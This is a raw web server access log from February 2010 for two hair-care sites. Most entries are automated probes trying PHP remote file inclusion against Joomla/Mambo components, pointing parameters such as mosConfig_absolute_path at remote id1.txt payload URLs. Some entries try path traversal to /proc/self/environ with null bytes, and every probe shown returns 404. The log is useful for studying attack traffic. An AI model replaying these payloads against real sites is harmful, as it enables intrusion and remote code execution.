219.240.36.36 - - [14/Feb/2010:17:41:02 -0800] "GET /logs//delete_all.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
219.240.36.36 - - [14/Feb/2010:17:41:02 -0800] "GET /logs/access.log//delete_all.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
219.240.36.36 - - [14/Feb/2010:17:41:02 -0800] "GET /delete_all.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
203.124.149.168 - - [14/Feb/2010:17:43:01 -0800] "GET /logs//delete_all.php?board_skin_path=http://www.gruppoanima.it/gruppoanima/templates/ja_purity/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
203.124.149.168 - - [14/Feb/2010:17:43:01 -0800] "GET /delete_all.php?board_skin_path=http://www.gruppoanima.it/gruppoanima/templates/ja_purity/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
203.124.149.168 - - [14/Feb/2010:17:43:01 -0800] "GET /logs/access.log%20%20//delete_all.php?board_skin_path=http://www.gruppoanima.it/gruppoanima/templates/ja_purity/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
211.233.32.134 - - [14/Feb/2010:17:43:06 -0800] "GET /logs//delete_all.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
211.233.32.134 - - [14/Feb/2010:17:43:06 -0800] "GET /logs/access.log//delete_all.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
211.233.32.134 - - [14/Feb/2010:17:43:06 -0800] "GET /delete_all.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
211.233.32.134 - - [14/Feb/2010:17:44:28 -0800] "GET /logs/access.log%20%20//delete_all.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
211.233.32.134 - - [14/Feb/2010:17:44:28 -0800] "GET /logs//delete_all.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
211.233.32.134 - - [14/Feb/2010:17:44:29 -0800] "GET /delete_all.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
204.213.93.197 - - [14/Feb/2010:17:44:59 -0800] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
204.213.93.197 - - [14/Feb/2010:17:44:59 -0800] "GET /logs////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
204.213.93.197 - - [14/Feb/2010:17:44:59 -0800] "GET /logs/access_100125.log%20%20////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
204.213.93.197 - - [14/Feb/2010:17:45:17 -0800] "GET /logs/access_100118.log%20%20////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
203.124.149.168 - - [14/Feb/2010:17:46:05 -0800] "GET /logs//delete_all.php?board_skin_path=http://www.gruppoanima.it/gruppoanima/templates/ja_purity/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
203.124.149.168 - - [14/Feb/2010:17:46:05 -0800] "GET /logs/access.log//delete_all.php?board_skin_path=http://www.gruppoanima.it/gruppoanima/templates/ja_purity/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
203.124.149.168 - - [14/Feb/2010:17:46:05 -0800] "GET /delete_all.php?board_skin_path=http://www.gruppoanima.it/gruppoanima/templates/ja_purity/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
67.195.115.235 - - [14/Feb/2010:17:46:44 -0800] "GET /freehairsecretsphp/viewtopic.php?p=2924 HTTP/1.0" 200 333 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
218.38.34.19 - - [14/Feb/2010:17:48:00 -0800] "GET /index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.38.34.19 - - [14/Feb/2010:17:48:00 -0800] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.38.34.19 - - [14/Feb/2010:17:48:03 -0800] "GET /logs/access_100125.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.195.115.235 - - [14/Feb/2010:17:57:02 -0800] "GET /freehairsecretsphp/viewtopic.php?p=9876 HTTP/1.0" 200 333 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
125.141.91.138 - - [14/Feb/2010:18:02:06 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
125.141.91.138 - - [14/Feb/2010:18:02:06 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
125.141.91.138 - - [14/Feb/2010:18:02:06 -0800] "GET /logs/access.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
125.141.91.138 - - [14/Feb/2010:18:02:10 -0800] "GET /logs/access_100125.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
125.141.91.138 - - [14/Feb/2010:18:02:10 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
125.141.91.138 - - [14/Feb/2010:18:02:10 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
125.141.91.138 - - [14/Feb/2010:18:02:38 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
125.141.91.138 - - [14/Feb/2010:18:02:38 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
125.141.91.138 - - [14/Feb/2010:18:02:38 -0800] "GET /logs/access.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
125.141.91.138 - - [14/Feb/2010:18:02:39 -0800] "GET /logs/access.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
125.141.91.138 - - [14/Feb/2010:18:02:39 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
125.141.91.138 - - [14/Feb/2010:18:02:39 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
125.141.91.138 - - [14/Feb/2010:18:02:42 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
125.141.91.138 - - [14/Feb/2010:18:02:42 -0800] "GET /logs/access_100125.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
125.141.91.138 - - [14/Feb/2010:18:02:42 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
125.141.91.138 - - [14/Feb/2010:18:02:43 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
125.141.91.138 - - [14/Feb/2010:18:02:44 -0800] "GET /logs/access_100125.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
125.141.91.138 - - [14/Feb/2010:18:02:44 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.249.65.213 - - [14/Feb/2010:18:25:38 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "growlonghairfast.com"
66.249.65.219 - - [14/Feb/2010:18:25:42 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.freehairsecrets.com"
189.108.236.148 - - [14/Feb/2010:18:36:01 -0800] "GET //include/admin.lib.inc.php?site_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
189.108.236.148 - - [14/Feb/2010:18:36:01 -0800] "GET /logs/access.log///include/admin.lib.inc.php?site_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
189.108.236.148 - - [14/Feb/2010:18:36:01 -0800] "GET /logs///include/admin.lib.inc.php?site_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
66.249.65.250 - - [14/Feb/2010:18:36:43 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "freehairsecrets.com"
218.55.227.153 - - [14/Feb/2010:18:43:28 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://ato.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.55.227.153 - - [14/Feb/2010:18:43:28 -0800] "GET /logs/access_100125.log/components/com_performs/performs.php?mosConfig_absolute_path=http://ato.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.55.227.153 - - [14/Feb/2010:18:43:28 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://ato.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
219.240.36.36 - - [14/Feb/2010:18:45:26 -0800] "GET /delete_all.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
219.240.36.36 - - [14/Feb/2010:18:45:27 -0800] "GET /logs/access.log%20%20//delete_all.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
219.240.36.36 - - [14/Feb/2010:18:45:27 -0800] "GET /logs//delete_all.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
218.55.227.153 - - [14/Feb/2010:18:46:40 -0800] "GET /logs/access_100125.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://ato.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.55.227.153 - - [14/Feb/2010:18:46:41 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://ato.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.55.227.153 - - [14/Feb/2010:18:46:41 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://ato.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.55.227.153 - - [14/Feb/2010:18:46:42 -0800] "GET /logs/access_100125.log/components/com_performs/performs.php?mosConfig_absolute_path=http://ato.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.55.227.153 - - [14/Feb/2010:18:46:42 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://ato.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.55.227.153 - - [14/Feb/2010:18:46:46 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://ato.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.55.227.153 - - [14/Feb/2010:18:46:46 -0800] "GET /logs/access_100125.log/components/com_performs/performs.php?mosConfig_absolute_path=http://ato.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
219.240.36.36 - - [14/Feb/2010:18:48:46 -0800] "GET /logs//delete_all.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
219.240.36.36 - - [14/Feb/2010:18:48:46 -0800] "GET /delete_all.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
219.240.36.36 - - [14/Feb/2010:18:48:46 -0800] "GET /logs/access.log%20%20//delete_all.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
218.55.227.153 - - [14/Feb/2010:18:50:18 -0800] "GET /logs/access_100125.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://ato.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.55.227.153 - - [14/Feb/2010:18:50:19 -0800] "GET /logs/access_100125.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://ato.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
89.201.67.104 - - [14/Feb/2010:18:50:26 -0800] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; KKman2.0)" "growlonghairfast.com"
89.201.67.104 - - [14/Feb/2010:18:50:28 -0800] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; KKman2.0)" "growlonghairfast.com"
219.240.36.36 - - [14/Feb/2010:18:52:39 -0800] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.sarpifirenze.it/media/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
219.240.36.36 - - [14/Feb/2010:18:52:39 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.sarpifirenze.it/media/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
219.240.36.36 - - [14/Feb/2010:18:52:39 -0800] "GET /logs/access_100125.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.sarpifirenze.it/media/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.82.115.69 - - [14/Feb/2010:18:56:46 -0800] "GET /logs/access.log///vwar/backup/errors.php?error=http://files.sign.io/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
208.82.115.69 - - [14/Feb/2010:18:56:46 -0800] "GET /logs///vwar/backup/errors.php?error=http://files.sign.io/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
208.82.115.69 - - [14/Feb/2010:18:56:46 -0800] "GET //vwar/backup/errors.php?error=http://files.sign.io/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
67.195.115.240 - - [14/Feb/2010:18:56:53 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.growlonghairfast.com"
67.195.115.240 - - [14/Feb/2010:18:56:53 -0800] "GET / HTTP/1.0" 200 910 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.growlonghairfast.com"
219.240.36.36 - - [14/Feb/2010:18:58:42 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.sarpifirenze.it/media/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
219.240.36.36 - - [14/Feb/2010:18:58:43 -0800] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.sarpifirenze.it/media/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
219.240.36.36 - - [14/Feb/2010:18:58:43 -0800] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.sarpifirenze.it/media/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
61.78.109.87 - - [14/Feb/2010:18:58:59 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://ato.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.78.109.87 - - [14/Feb/2010:18:59:08 -0800] "GET /logs/access_100125.log/components/com_performs/performs.php?mosConfig_absolute_path=http://ato.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
219.240.36.36 - - [14/Feb/2010:18:59:24 -0800] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.sarpifirenze.it/media/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
219.240.36.36 - - [14/Feb/2010:18:59:24 -0800] "GET /logs/access_100125.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.sarpifirenze.it/media/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
219.240.36.36 - - [14/Feb/2010:18:59:29 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.sarpifirenze.it/media/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
219.240.36.36 - - [14/Feb/2010:18:59:55 -0800] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.sarpifirenze.it/media/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
219.240.36.36 - - [14/Feb/2010:18:59:55 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.sarpifirenze.it/media/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
219.240.36.36 - - [14/Feb/2010:18:59:55 -0800] "GET /logs/access_100125.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.sarpifirenze.it/media/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
89.208.32.87 - - [14/Feb/2010:19:23:50 -0800] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.76 [en] (Windows NT 5.0; U)" "growlonghairfast.com"
89.208.32.87 - - [14/Feb/2010:19:23:51 -0800] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.76 [en] (Windows NT 5.0; U)" "growlonghairfast.com"
89.208.32.87 - - [14/Feb/2010:19:23:51 -0800] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.76 [en] (Windows NT 5.0; U)" "growlonghairfast.com"
188.40.70.247 - - [14/Feb/2010:19:35:42 -0800] "GET //include/admin.lib.inc.php?site_path=http://immortal-killaz.servercamp.de/fanatix/cmdstate.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.freehairsecrets.com"
188.40.70.247 - - [14/Feb/2010:19:35:42 -0800] "GET /logs/access.log///include/admin.lib.inc.php?site_path=http://immortal-killaz.servercamp.de/fanatix/cmdstate.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.freehairsecrets.com"
188.40.70.247 - - [14/Feb/2010:19:35:43 -0800] "GET //include/admin.lib.inc.php?site_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.freehairsecrets.com"
188.40.70.247 - - [14/Feb/2010:19:35:43 -0800] "GET /logs/access.log///include/admin.lib.inc.php?site_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.freehairsecrets.com"
188.40.70.247 - - [14/Feb/2010:19:35:43 -0800] "GET //include/admin.lib.inc.php?site_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.freehairsecrets.com"
188.40.70.247 - - [14/Feb/2010:19:35:43 -0800] "GET /errors.php?error=http://immortal-killaz.servercamp.de/fanatix/cmdstate.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.freehairsecrets.com"
188.40.70.247 - - [14/Feb/2010:19:35:43 -0800] "GET /logs/access.log///include/admin.lib.inc.php?site_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.freehairsecrets.com"
188.40.70.247 - - [14/Feb/2010:19:35:44 -0800] "GET /logs/access.log/errors.php?error=http://immortal-killaz.servercamp.de/fanatix/cmdstate.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.freehairsecrets.com"
67.195.115.235 - - [14/Feb/2010:19:35:56 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
67.195.115.235 - - [14/Feb/2010:19:35:56 -0800] "GET /logs/?S=A HTTP/1.0" 200 4926 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
67.195.115.235 - - [14/Feb/2010:19:36:38 -0800] "GET /logs/access_100215.log HTTP/1.0" 200 3655063 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
210.205.6.233 - - [14/Feb/2010:19:45:15 -0800] "GET /logs/access_100125.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
210.205.6.233 - - [14/Feb/2010:19:45:15 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
210.205.6.233 - - [14/Feb/2010:19:45:15 -0800] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
